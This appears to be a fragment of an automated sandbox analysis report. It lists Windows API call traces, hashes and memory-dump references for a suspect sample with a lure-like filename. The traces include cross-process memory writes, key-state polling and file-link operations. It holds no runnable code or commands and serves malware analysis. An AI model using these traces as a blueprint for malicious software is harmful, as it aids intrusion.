                                                                            • Instruction Fuzzy Hash: 78512975604205DFCB15EF58C4948EDBBB6FF49324F098098E90A9B362DB31ED86CB90
                                                                            APIs
                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 006C6C33
                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 006C6C4A
                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 006C6C73
                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,006AAB79,00000000,00000000), ref: 006C6C98
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 006C6CC7
                                                                            Similarity
                                                                            • API ID: Window$Long$MessageSendShow
                                                                            • String ID:
                                                                            • API String ID: 3688381893-0
                                                                            • Opcode ID: d02cb28e4bc5f31c413c7be98638068d48adab1c0c55a23afbffa8d398a99839
                                                                            • Instruction ID: f0c31a7fd8187a4e997a09489c2e7aa8da1a3b3ed3e9e86a81bc64be6529e2a3
                                                                            • Opcode Fuzzy Hash: d02cb28e4bc5f31c413c7be98638068d48adab1c0c55a23afbffa8d398a99839
                                                                            • Instruction Fuzzy Hash: 2E41CD35A00144AFDB24CF28CD58FF97BA6EB09360F15026CF899A73A0C771AD51CA88
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00649141
                                                                            • ScreenToClient.USER32(00000000,?), ref: 0064915E
                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00649183
                                                                            • GetAsyncKeyState.USER32(00000002), ref: 0064919D
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 4210589936-0
                                                                            • Opcode ID: 94957f42f7f93638e3c108de1052841855a297a43460a726fdea73f78550847b
                                                                            • Instruction ID: a7e732b04071d1bf399310b68df9aa65906e17c3d3131984bdac8e4a8af6e212
                                                                            • Opcode Fuzzy Hash: 94957f42f7f93638e3c108de1052841855a297a43460a726fdea73f78550847b
                                                                            • Instruction Fuzzy Hash: CC41407190851BBBDF15AF64C848BFEB776FB05324F244319E469A72D0C730A950CB61
                                                                            APIs
                                                                            • GetInputState.USER32 ref: 006A38CB
                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 006A3922
                                                                            • TranslateMessage.USER32(?), ref: 006A394B
                                                                            • DispatchMessageW.USER32(?), ref: 006A3955
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A3966
                                                                            Similarity
                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                            • String ID:
                                                                            • API String ID: 2256411358-0
                                                                            • Opcode ID: dda37dc97425e5d1cfb4309fdb14238ad10a98fdda94e77d12b678774f815c93
                                                                            • Instruction ID: fc7d0ac2919993d502bdb233d3333dedf8a9ea9e51ad367dcccf10dbdcdb1ffb
                                                                            • Opcode Fuzzy Hash: dda37dc97425e5d1cfb4309fdb14238ad10a98fdda94e77d12b678774f815c93
                                                                            • Instruction Fuzzy Hash: FF31A370904351DEEB25EB249848BF777AAAB06304F44856DF456823E0F7B8AE85CF11
                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,006AC21E,00000000), ref: 006ACF38
                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 006ACF6F
                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,006AC21E,00000000), ref: 006ACFB4
                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,006AC21E,00000000), ref: 006ACFC8
                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,006AC21E,00000000), ref: 006ACFF2
                                                                            Similarity
                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                            • String ID:
                                                                            • API String ID: 3191363074-0
                                                                            • Opcode ID: a0effbe972854db9651d1db89b18e673b48cb67e98d3a88a9572f6d45efadf1a
                                                                            • Instruction ID: b68a0b769d520dc203b9f45645ec1de6fc5474f5eea19163d1989b6df4bb7c7f
                                                                            • Opcode Fuzzy Hash: a0effbe972854db9651d1db89b18e673b48cb67e98d3a88a9572f6d45efadf1a
                                                                            • Instruction Fuzzy Hash: F3314F71504205AFDB20EFA5C884DABBBFBEF15361B10442EF51AD2241DB30AE41DF60
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00691915
                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 006919C1
                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 006919C9
                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 006919DA
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 006919E2
                                                                            Similarity
                                                                            • API ID: MessagePostSleep$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3382505437-0
                                                                            • Opcode ID: 03a3f63d28b53c5c87aad4503bb1726ccc31956fe4e18b35f8e4906effe1c9da
                                                                            • Instruction ID: 5268f71eacb100a5c850cafc7e2cf07ebb854715904fc3dfff94cec826d40ce3
                                                                            • Opcode Fuzzy Hash: 03a3f63d28b53c5c87aad4503bb1726ccc31956fe4e18b35f8e4906effe1c9da
                                                                            • Instruction Fuzzy Hash: 7731D67190021AEFDF00CFA8CD59AEE3BBAEB45325F104225F925AB2D1C7709D44DB90
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 006B0951
                                                                            • GetForegroundWindow.USER32 ref: 006B0968
                                                                            • GetDC.USER32(00000000), ref: 006B09A4
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 006B09B0
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 006B09E8
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: 792b9d31dbda99b4289880b531286bad34581d4df334dd6496a621f455945022
                                                                            • Instruction ID: 767d6ca29105ec2348b2932846bdbcac171dab2fae447952e68e5163c82e5017
                                                                            • Opcode Fuzzy Hash: 792b9d31dbda99b4289880b531286bad34581d4df334dd6496a621f455945022
                                                                            • Instruction Fuzzy Hash: 29218175600204AFD744EF65C984EAEBBEAEF49750F04906CF84A97752CB30AC44CF90
                                                                            APIs
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00649693
                                                                            • SelectObject.GDI32(?,00000000), ref: 006496A2
                                                                            • BeginPath.GDI32(?), ref: 006496B9
                                                                            • SelectObject.GDI32(?,00000000), ref: 006496E2
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            APIs
                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?,?,0069035E), ref: 0069002B
                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?), ref: 00690046
                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?), ref: 00690054
                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?), ref: 00690064
                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?), ref: 00690070
                                                                            Similarity
                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3897988419-0
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0069E997
                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0069E9A5
                                                                            • Sleep.KERNEL32(00000000), ref: 0069E9AD
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0069E9B7
                                                                            • Sleep.KERNEL32 ref: 0069E9F3
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            APIs
                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00691114
                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 00691120
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 0069112F
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 00691136
                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0069114D
                                                                            Similarity
                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 842720411-0
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00690FCA
                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00690FD6
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00690FE5
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00690FEC
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00691002
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0069102A
                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00691036
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00691045
                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0069104C
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00691062
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006A017D,?,006A32FC,?,00000001,00672592,?), ref: 006A0324
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006A017D,?,006A32FC,?,00000001,00672592,?), ref: 006A0331
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006A017D,?,006A32FC,?,00000001,00672592,?), ref: 006A033E
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006A017D,?,006A32FC,?,00000001,00672592,?), ref: 006A034B
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006A017D,?,006A32FC,?,00000001,00672592,?), ref: 006A0358
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006A017D,?,006A32FC,?,00000001,00672592,?), ref: 006A0365
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00695C58
                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00695C6F
                                                                            • MessageBeep.USER32(00000000), ref: 00695C87
                                                                            • KillTimer.USER32(?,0000040A), ref: 00695CA3
                                                                            • EndDialog.USER32(?,00000001), ref: 00695CBD
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            APIs
                                                                            • EndPath.GDI32(?), ref: 006495D4
                                                                            • StrokeAndFillPath.GDI32(?,?,006871F7,00000000,?,?,?), ref: 006495F0
                                                                            • SelectObject.GDI32(?,00000000), ref: 00649603
                                                                            • DeleteObject.GDI32 ref: 00649616
                                                                            • StrokePath.GDI32(?), ref: 00649631
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            APIs
                                                                              • Part of subcall function 00633AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00633A97,?,?,00632E7F,?,?,?,00000000), ref: 00633AC2
                                                                            • CoInitialize.OLE32(00000000), ref: 006A5995
                                                                            • CoCreateInstance.OLE32(006CFCF8,00000000,00000001,006CFB68,?), ref: 006A59AE
                                                                            • CoUninitialize.OLE32 ref: 006A59CC
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                            • String ID: .lnk
                                                                            • API String ID: 3769357847-24824748
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0069C6EE
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0069C79C
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0069C7CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$Default
                                                                            • String ID: 0
                                                                            APIs
                                                                              • Part of subcall function 0069B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006921D0,?,?,00000034,00000800,?,00000034), ref: 0069B42D
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00692760
                                                                              • Part of subcall function 0069B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0069B3F8
                                                                              • Part of subcall function 0069B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0069B355
                                                                              • Part of subcall function 0069B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00692194,00000034,?,?,00001004,00000000,00000000), ref: 0069B365
                                                                              • Part of subcall function 0069B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00692194,00000034,?,?,00001004,00000000,00000000), ref: 0069B37B
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006927CD
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0069281A
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0069C306
                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 0069C34C
                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00701990,00DC9AD8), ref: 0069C395
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem
                                                                            • String ID: 0
                                                                            APIs
                                                                              • Part of subcall function 0069DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0069CF22,?), ref: 0069DDFD
                                                                              • Part of subcall function 0069DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0069CF22,?), ref: 0069DE16
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0069CF45
                                                                            • MoveFileW.KERNEL32(?,?), ref: 0069CF7F
                                                                            • SHFileOperationW.SHELL32(?), ref: 0069D061
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$MoveOperationlstrcmpi
                                                                            • String ID: \*.*
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,006CCC08,00000000,?,?,?,?), ref: 006C44AA
                                                                            • GetWindowLongW.USER32 ref: 006C44C7
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006C44D7
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            APIs
                                                                            • SysReAllocString.OLEAUT32(?,?), ref: 00696EED
                                                                            • VariantCopyInd.OLEAUT32(?,?), ref: 00696F08
                                                                            • VariantClear.OLEAUT32(?), ref: 00696F12
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Variant$AllocClearCopyString
                                                                            • String ID: *ji
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006C3F40
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006C3F54
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 006C3F78
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysMonthCal32
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 006C4705
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 006C4713
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 006C471A
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006C3840
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006C3850
                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006C3876
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006A4A08
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006A4A5C
                                                                            • SetErrorMode.KERNEL32(00000000,?,?,006CCC08), ref: 006A4AD0
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume
                                                                            • String ID: %lu
                                                                            • API String ID: 2507767853-685833217
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006C424F
                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006C4264
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006C4271
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                             • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            APIs
                                                                              • Part of subcall function 00692DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00692DC5
                                                                              • Part of subcall function 00692DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00692DD6
                                                                              • Part of subcall function 00692DA7: GetCurrentThreadId.KERNEL32 ref: 00692DDD
                                                                              • Part of subcall function 00692DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00692DE4
                                                                            • GetFocus.USER32 ref: 00692F78
                                                                              • Part of subcall function 00692DEE: GetParent.USER32(00000000), ref: 00692DF9
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00692FC3
                                                                            • EnumChildWindows.USER32(?,0069303B), ref: 00692FEB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                             • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
                                                                            • String ID: %s%d
                                                                            • API String ID: 2776554818-1110647743
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006C58C1
                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006C58EE
                                                                            • DrawMenuBar.USER32(?), ref: 006C58FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                             • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Menu$InfoItem$Draw
                                                                            • String ID: 0
                                                                            • API String ID: 3227129158-4108050209
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0068D3BF
                                                                            • FreeLibrary.KERNEL32 ref: 0068D3E5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                             • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AddressFreeLibraryProc
                                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                                            • API String ID: 3013587201-2590602151
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                             • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                             • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInitInitializeUninitialize
                                                                            • String ID:
                                                                            • API String ID: 1998397398-0
                                                                            APIs
                                                                            • GetWindowRect.USER32(00DCDC08,?), ref: 006C62E2
                                                                            • ScreenToClient.USER32(?,?), ref: 006C6315
                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 006C6382
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                             • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientMoveRectScreen
                                                                            • String ID:
                                                                            • API String ID: 3880355969-0
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 006B1AFD
                                                                            • WSAGetLastError.WSOCK32 ref: 006B1B0B
                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006B1B8A
                                                                            • WSAGetLastError.WSOCK32 ref: 006B1B94
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                             • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$socket
                                                                            • String ID:
                                                                            • API String ID: 1881357543-0
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006A5783
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 006A57A9
                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006A57CE
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006A57FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                             • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
